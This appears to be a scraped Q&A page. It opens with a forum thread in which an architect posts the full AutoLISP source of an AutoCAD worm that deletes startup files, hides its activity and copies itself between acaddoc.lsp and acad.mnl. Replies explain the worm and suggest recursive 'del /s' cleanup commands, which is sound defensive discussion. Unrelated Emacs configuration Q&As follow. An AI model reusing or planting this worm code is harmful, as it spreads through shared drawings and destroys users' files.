My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below.
I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes".
Questions
What is this replacing the files with (currently searching for acadapq) ?
Who writes a virus for AutoCAD?!?!
Has anyone seen this before? the CAD forums aren't very helpful.
(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.fas")
(if (vl-file-delete (findfile "acad.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "lcm.fas")
(if (vl-file-delete (findfile "lcm.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.lsp")
(if (vl-file-delete (findfile "acad.lsp"))
(setq n 0))
(setq n 2)))
(defun wwriteapp ()
(if (setq wwjm1 (open wnewacad "w"))
(progn
(setq wwjm (open woldacad "r"))
(while (setq wwz (read-line wwjm))
(write-line wwz wwjm1))
(close wwjm)
(close wwjm1))))
(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq ab (atoi (substr wz 4 1)))
(close wwjm)
(if (> ab bb)
(setq lbz 1))))
(setq wwjqm (strcat wpath "acad.mnl"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq nb (atoi (substr wz 4 1)))
(close wwjm)
(if (< nb bb)
(setq lbz 1)))
(setq lbz 1))
(if (= lbz 1)
(progn
(setq woldacad (strcat dpath "acaddoc.lsp"))
(setq wnewacad (strcat wpath "acad.mnl"))
(wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
(/= (substr dpath 1 1) (chr 68))
(/= (substr dpath 1 1) (chr 69))
(/= (substr dpath 1 1) (chr 70)))
(progn
(setq woldacad (strcat wpath "acad.mnl"))
(setq wnewacad (strcat dpath "acaddoc.lsp"))
(wwriteapp))
(vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)
It is doing a support file path walk, delete and replace of the common AutoCAD customization files. ("acad.fas","acad.lsp", "acaddoc.lsp") I do not know what "lcm.fas" is all about. Is it part of an AutoCAD vertical product ie AutoCAD mechanical or Architectural desktop?
The looping is essentially "while I keep finding on the support path delete it".
So far as I know AutoCAD has no built in defense against this. (There may be some acad system var that stops execution of these files).
The "cmdecho" lines are saving and restoring the system variable that allows/suppresses the echoing of commands. Turns it off while running (so you don't notice) then restores the original setting.
A polite virus :\
When AutoCAD starts up it executes the first "acad.fas" & first "acad.lsp" it finds on it's support path. Everytime AutoCAD loads a new .dwg it executes the "acaddoc.lsp".
As Follow these steps to get rid of this worm:
Manually
Copy the attached routine on your PC: acaddocfix_1.6.lsp
Load the lisp file using APPLOAD command
The lisp file will run automatically and it will clean all the existences of the worm in your support folders.
While their is another way we can do it as a batch file by adding it once any user start his/her PC as I check with the IT before
Auto run
Run an antivirus or a cleaner to get rid of “acaddoc.lsp” files. Normally cleaner routine installs a simple routine in your acad20XXdoc.lsp file which automatically clean those files but i recommend cleaning all the viruses with an anti-virus first.
You can also run -acaddoc.bat dos batch file to clean all your drives manually.
Run this batch once and it will delete all acaddoc.lsp files on your system.
NOTE: If any of the infected files in your Autocad Support folders are READONLY the cleaner won’t be able to clean those files !!
kindly refer to http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/
The wild thing is that the lisp file only gets created when the files are opened on the network, local copies don't seem to have this issue.
add del /s acaddoc.lsp and del /s acad.lsp to all users login scripts and run this for a week or so and it should get rid of all the acaddoc.lsp and acad.lsp files which the virus coomes in...Make sure you do not actually use any of these files for your own purpose though before running the delete command
Related
In GNU Emacs for OSX, how can I keep the kill ring and OSX clipboard separate? (Such that I essentially have two separate kill rings.)
With desired behavior, this would work:
1. ⌘C to copy text from the web to OSX clipboard.
2. controlk to kill a line in Emacs.
3. controly to yank killed text from Emacs kill ring to current Emacs buffer.
4. ⌘v to paste original web text from OSX clipboard to current Emacs buffer.
This works out of the box in Aquamacs. How to make work in GNU Emacs?
This question was discussed as it pertains to Windows here:
Emacs: How to separate the kill ring from the system clipboard?
and here:
http://lists.gnu.org/archive/html/help-emacs-windows/2010-02/msg00001.HTML
...but this solution does not work in OSX. I would like a solution for Mac OSX.
The solution in Emacs: How to separate the kill ring from the system clipboard? does work, though not complete. You may call pbcopy yourself to get clipboard pasting right. For instance, try the following in your .emacs. Note that s-v is for Cmd+V in an OS X window system. Same goes for s-c.
;;; Tested on:
;;; 1. GNU Emacs 24.3.1 (x86_64-apple-darwin13.0.0)
;;; of 2013-12-22 on tennine-slave.macports.org
;;; (MacPorts emacs#24.3_1)
;;;
;;; 2. GNU Emacs 24.3.1 (x86_64-apple-darwin, NS apple-appkit-1038.36)
;;; of 2013-03-12 on bob.porkrind.org
;;; (Emacs For Mac OS X)
(defun isolate-kill-ring()
"Isolate Emacs kill ring from OS X system pasteboard.
This function is only necessary in window system."
(interactive)
(setq interprogram-cut-function nil)
(setq interprogram-paste-function nil))
(defun pasteboard-copy()
"Copy region to OS X system pasteboard."
(interactive)
(shell-command-on-region
(region-beginning) (region-end) "pbcopy"))
(defun pasteboard-paste()
"Paste from OS X system pasteboard via `pbpaste' to point."
(interactive)
(shell-command-on-region
(point) (if mark-active (mark) (point)) "pbpaste" nil t))
(defun pasteboard-cut()
"Cut region and put on OS X system pasteboard."
(interactive)
(pasteboard-copy)
(delete-region (region-beginning) (region-end)))
(if window-system
(progn
(isolate-kill-ring)
;; bind CMD+C to pasteboard-copy
(global-set-key (kbd "s-c") 'pasteboard-copy)
;; bind CMD+V to pasteboard-paste
(global-set-key (kbd "s-v") 'pasteboard-paste)
;; bind CMD+X to pasteboard-cut
(global-set-key (kbd "s-x") 'pasteboard-cut))
;; you might also want to assign some keybindings for non-window
;; system usage (i.e., in your text terminal, where the
;; command->super does not work)
)
If you ever run into problems with UTF-8, consider the following possible solution:
;; handle emacs utf-8 input
(set-terminal-coding-system 'utf-8)
(set-keyboard-coding-system 'utf-8)
(prefer-coding-system 'utf-8)
(setenv "LANG" "en_US.UTF-8")
After much fiddling around, I'm pretty sure that the only way to make this work is to override the x-select-text method. Check out my answer here for all the details: https://stackoverflow.com/a/23254771/71522
NOTE: This draft solution is not meant to be an Emacs system-wide modification separating the clipboards -- instead, this is a custom solution designed to keep the clipboards separated on an interactive basis only when specifically using these custom functions. Other functions within
Emacs that use the kill-ring can be modified using a similar method -- the variables interprogram-cut-function and interprogram-paste-function can be made let-bound to a nil value for the duration of the specific functions (either through advice, or modification of the source itself, or creating new functions and/or using a defalias). However, the latter is beyond the scope of this limited example.
HISTORY
First Draft (December 23, 2014): This is a first draft, which is based on the idea that the OSX clipboard may be accessed only when using C-u before calling either the copy or paste functions. If C-u is called first, then the OSX clipboard is utilized. As I use the functions more on a daily basis, I may have additional revisions to this code and I will update same from time to time:
EDIT (December 24, 2014): Removed * from the interactive command statement as to lawlist-copy-selected-region -- that was a read-only check needed for pasting, but not copying. Added a statement regarding the general nature of this example.
EDIT (December 28, 2014): Revised code to better handle when the user forgot to select a region before calling lawlist-copy-selected-region. Small revisions to make the code more concise.
(defun lawlist-copy-selected-region (&optional arg)
(interactive "P")
(let* (
(interprogram-cut-function
(when (equal arg '(4)) interprogram-cut-function))
(interprogram-paste-function
(when (equal arg '(4)) interprogram-paste-function))
(region-active-p (region-active-p))
(beg (when region-active-p (region-beginning)))
(end (when region-active-p (region-end)))
(copied-string
(when region-active-p (buffer-substring-no-properties beg end))) )
(unless region-active-p
(let ((debug-on-quit nil))
(signal 'quit `("No region has been selected!"))))
(copy-region-as-kill beg end)
(when (not (active-minibuffer-window))
(message "%s"
(concat
(if (and interprogram-cut-function interprogram-paste-function)
"OSX+Emacs: "
"Emacs: ")
(truncate-string-to-width copied-string 40)
(when (> (length copied-string) 40)
" . . .")))) ))
(defun lawlist-yank (&optional arg)
(interactive "*P")
(unless arg (setq arg 1))
(setq yank-window-start (window-start))
(setq this-command t)
(push-mark (point))
(insert-for-yank
(lawlist-current-kill
(cond
((listp arg)
arg)
((eq arg '-)
-2)
(t
(1- arg) ))))
(if (consp arg)
(goto-char (prog1 (mark t)
(set-marker (mark-marker) (point) (current-buffer)))))
(if (eq this-command t)
(setq this-command 'yank))
(when (region-active-p)
(setq mark-active nil))
nil)
(defun lawlist-current-kill (n &optional do-not-move)
(let ((interprogram-paste
(and
(equal n '(4))
interprogram-paste-function
(funcall interprogram-paste-function))))
(cond
(interprogram-paste
(let ((interprogram-cut-function nil))
(if (listp interprogram-paste)
(mapc 'kill-new (nreverse interprogram-paste))
(kill-new interprogram-paste)))
(car kill-ring))
((and (equal n '(4)) (not interprogram-paste))
(car kill-ring))
(t
(or kill-ring
(let ((debug-on-quit nil))
(signal 'quit `("The kill-ring is empty."))))
(let (
(ARGth-kill-element
(nthcdr
(mod (- n (length kill-ring-yank-pointer)) (length kill-ring))
kill-ring)))
(unless do-not-move
(setq kill-ring-yank-pointer ARGth-kill-element)
(when
(and
yank-pop-change-selection
(> n 0)
interprogram-cut-function)
(funcall interprogram-cut-function (car ARGth-kill-element))))
(car ARGth-kill-element))))))
(global-set-key (kbd "C-x M-y")
(lambda ()
(interactive)
(insert-string (ns-get-pasteboard))))
(global-set-key (kbd "C-x M-w")
(lambda ()
(interactive)
(when (region-active-p)
(ns-set-pasteboard
(buffer-substring (region-beginning)
(region-end))))))
simpleclip might be helpful -
Simplified access to the system clipboard in Emacs.
simpleclip-mode radically simplifies clipboard handling: the system
clipboard and the Emacs kill ring are made completely independent, and
never influence each other.
The super keybindings are friendly for OS X: super is generally mapped
to the "command" key ie ⌘.
Tested on OS X, X11, and MS Windows
https://github.com/rolandwalker/simpleclip
Use
(setq select-enable-clipboard nil)
This will only separate the two clipboards, and for ⌘ c and ⌘ v to work like mentioned you will have to rebind them to clipboard-kill-ring-save and clipboard-yank:
(keymap-global-set "s-c" 'clipboard-kill-ring-save)
(keymap-global-set "s-x" 'clipboard-kill-region)
(keymap-global-set "s-v" 'clipboard-yank)
I am using this Emacs: https://github.com/railwaycat/emacs-mac-port, and it also works on Emacs 28 built from source.
Any ideas regarding how to configure Wanderlust to open emails in a new buffer, instead of a split window? There is just too much happening with four (4) windows -- summary message buffer; message buffer; big brother insidious database address manager; and the mini-buffer. (See the screenshot below.)
I think I've located the relevant portion of the code in wl-message.el, but I'm not sure what portion to change. (setq wl-message-window-size '(1 . 1)) in the init.el is not what I'm looking for, because I'd still have to share the screen with other buffers.
I'm spending a lot of time switching and closing windows to get a full size buffer, and I'm hoping to just eliminate multiple windows when checking my e-mail.
Thanks . . . any help would be greatly appreciated.
;;; wl-message.el -- Message buffer handling from summary buffer.
(defun wl-message-buffer-window ()
"Get message buffer window if any."
(let* ((start-win (selected-window))
(cur-win start-win))
(catch 'found
(while (progn
(setq cur-win (next-window cur-win))
(with-current-buffer (window-buffer cur-win)
(if (or (eq major-mode 'wl-message-mode)
(eq major-mode 'mime-view-mode))
(throw 'found cur-win)))
(not (eq cur-win start-win)))))))
(defun wl-message-select-buffer (buffer)
"Select BUFFER as a message buffer."
(let ((window (get-buffer-window buffer))
(sum (car wl-message-window-size))
(mes (cdr wl-message-window-size))
whi)
(when (and window
(not (eq (with-current-buffer (window-buffer window)
wl-message-buffer-cur-summary-buffer)
(current-buffer))))
(delete-window window)
(run-hooks 'wl-message-window-deleted-hook)
(setq window nil))
(if window
(select-window window)
(when wl-fixed-window-configuration
(delete-other-windows)
(and wl-stay-folder-window
(wl-summary-toggle-disp-folder)))
;; There's no buffer window. Search for message window and snatch it.
(if (setq window (wl-message-buffer-window))
(select-window window)
(setq whi (1- (window-height)))
(if mes
(progn
(let ((total (+ sum mes)))
(setq sum (max window-min-height (/ (* whi sum) total)))
(setq mes (max window-min-height (/ (* whi mes) total))))
(if (< whi (+ sum mes))
(enlarge-window (- (+ sum mes) whi)))))
(split-window (get-buffer-window (current-buffer)) sum)
(other-window 1)))
(switch-to-buffer buffer)))
(source: lawlist.com)
SOLUTION # 1: The variable wl-message-buffer-name that is defined within wl-vars.el makes the message buffer uninteresting by virtue of the space at the beginning of the buffer name: *WL:Message*. Inasmuch as Emacs hides uninteresting buffers by default, one solution is to modify the aforementioned variable by removing the space at the beginning of the buffer name. That way, the buffer is always visible and it is just a matter of switching to the window that displays the message and then delete-other-windows. The added advantage is that it is no longer necessary to return to the summary buffer to view an e-mail that has already been opened, since there is already an open buffer dedicated to said e-mail.
(defcustom wl-message-buffer-name "*WL:Message*" ;; " *WL:Message*"
"*Buffer name for message buffers."
:group 'wl-pref
:group 'wl-setting)
SOLUTION # 2: This second solution is no longer the preferred method and will most likely be removed entirely from this answer. The word search utility I was using could not comb the wl-vars.el file for some unknown reason, so this second solution was a workaround.
Edit the key map for wl-summary-read (inside wl-summary.el) and replace it with the function lawlist-wl-summary-read so that hitting the space bar activates said function. wl-summary-enter-handler remains defined as the enter key, which opens messages in the default manner.
(define-key wl-summary-mode-map " " 'lawlist-wl-summary-read)
(defun lawlist-wl-summary-read nil
"Clone the the buffer and make new buffer name unique."
(interactive)
(wl-summary-enter-handler)
(windmove-down)
(let ((n 0)
bufname)
(while (progn
(setq bufname (concat "email"
(if (= n 0) "" (int-to-string n))
"")) ;; could be an ending, like an asterick *
(setq n (1- n)) ;; if + instead of -, then no hyphen and no space between buffer name and the number
(get-buffer bufname)))
(clone-indirect-buffer bufname nil)
(switch-to-buffer bufname)
(delete-other-windows) ))
I want emacs to add last edit location to the mark ring, so I can jump back to previous edit locations.
Ideally this would only mark one edit location per line. When I edit another line, the last edit location on that line would be added to the ring, and so forth.
I'm not familiar with Lisp to implement this myself. If anyone knows of a plugin or can kindly provide a solution that would be great! :)
You can install a package goto-last-change which allows you to jump sequentially to the buffer undo positions (last edit locations).
Session.el provides this functionality bound to "C-x C-/" or session-jump-to-last-change.
Session dos it per buffer. I'm unaware of anything that does it globally.
I implement a similar function, by recording 2 file's last edit locations(not per buffer), and cycle them when requested. Somewhat like how eclipse does(but less powerful, only 2 file's are recorded)
emacs-last-edit-location
the code:
;;; record two different file's last change. cycle them
(defvar feng-last-change-pos1 nil)
(defvar feng-last-change-pos2 nil)
(defun feng-swap-last-changes ()
(when feng-last-change-pos2
(let ((tmp feng-last-change-pos2))
(setf feng-last-change-pos2 feng-last-change-pos1
feng-last-change-pos1 tmp))))
(defun feng-goto-last-change ()
(interactive)
(when feng-last-change-pos1
(let* ((buffer (find-file-noselect (car feng-last-change-pos1)))
(win (get-buffer-window buffer)))
(if win
(select-window win)
(switch-to-buffer-other-window buffer))
(goto-char (cdr feng-last-change-pos1))
(feng-swap-last-changes))))
(defun feng-buffer-change-hook (beg end len)
(let ((bfn (buffer-file-name))
(file (car feng-last-change-pos1)))
(when bfn
(if (or (not file) (equal bfn file)) ;; change the same file
(setq feng-last-change-pos1 (cons bfn end))
(progn (setq feng-last-change-pos2 (cons bfn end))
(feng-swap-last-changes))))))
(add-hook 'after-change-functions 'feng-buffer-change-hook)
;;; just quick to reach
(global-set-key (kbd "M-`") 'feng-goto-last-change)
I wrote a snippet to copy previous line to point,if I repeat the command,it copy more previous line. It's here:
(defun my-copy-line (num)
"copy lines"
(interactive "p")
(save-excursion
(move-end-of-line 1)
(push-mark)
(move-beginning-of-line num)
(kill-ring-save (point) (mark))))
(defvar copy-line-num 1)
(defun my-copy-line-here (num)
"copy line ahead here"
(interactive "p")
(if (eq this-command last-command)
(setq copy-line-num (+ copy-line-num num)) ;count num lines up
(setq copy-line-default 1))
(save-excursion
(save-excursion ;make current line blank
(move-beginning-of-line 1)
(push-mark)
(move-end-of-line 1)
(kill-region (point) (mark))) ;不用kill-line,以免删除空白行
(push-mark)
(previous-line copy-line-num)
(my-copy-line 1)
(exchange-point-and-mark)
(yank))
(setq this-command 'my-copy-line-here))
I intended to yank previous line to override current line.If I repeat my-copy-line-here,I'll yank the 2th previous line,this is accomplished by the test (if (eq this-command last-command).But it failed ,Because every time after executing my-copy-line-here,it sets the last-command to yank,instead my-copy-line-here.I just can't figure out what's going on.I need your help.
`M-y (yank-pop) works similarly, pasting previous copied lines on repeated calls. Checking its sources, I see two differences with yours:
; explicit check for yank
(if (not (eq last-command 'yank))
; setting this command
(setq this-command 'yank)
Perhaps one or both of these together can be useful. Set this-command after calling yank maybe?
I've got 2 windows open in Emacs and I'd like to swap their positions.
Ie Consider having a REPL above the source file and I'd like to swap their locations so that the REPL is below the source file.
I'd also like to preserve the sizes of the windows
I shamelessly stole this from Steve Yegge's .emacs
(defun swap-windows ()
"If you have 2 windows, it swaps them."
(interactive)
(cond ((not (= (count-windows) 2)) (message "You need exactly 2 windows to do this."))
(t
(let* ((w1 (first (window-list)))
(w2 (second (window-list)))
(b1 (window-buffer w1))
(b2 (window-buffer w2))
(s1 (window-start w1))
(s2 (window-start w2)))
(set-window-buffer w1 b2)
(set-window-buffer w2 b1)
(set-window-start w1 s2)
(set-window-start w2 s1)))))
Tested on Emacs 23.1.1 on Gentoo. This does preserve window sizes.
I also found this which is a little cleaner.
(defun transpose-windows ()
(interactive)
(let ((this-buffer (window-buffer (selected-window)))
(other-buffer (prog2
(other-window +1)
(window-buffer (selected-window))
(other-window -1))))
(switch-to-buffer other-buffer)
(switch-to-buffer-other-window this-buffer)
(other-window -1)))
Also tested on Emacs 23.1.1
The following version works with any number of windows. When there are more than two windows, repeated invocations will make the selected buffer appear in each windows successively.
(defun swap-buffer ()
(interactive)
(cond ((one-window-p) (display-buffer (other-buffer)))
((let* ((buffer-a (current-buffer))
(window-b (cadr (window-list)))
(buffer-b (window-buffer window-b)))
(set-window-buffer window-b buffer-a)
(switch-to-buffer buffer-b)
(other-window 1)))))
I find the TransposeFrame library useful. I mostly use it for swapping two windows, as per this question; but it provides more general functionality than just that.
Follow the link to see ascii diagrams of the various transformations.
See http://www.emacswiki.org/cgi-bin/wiki/buffer-move.el. You can install it through elpa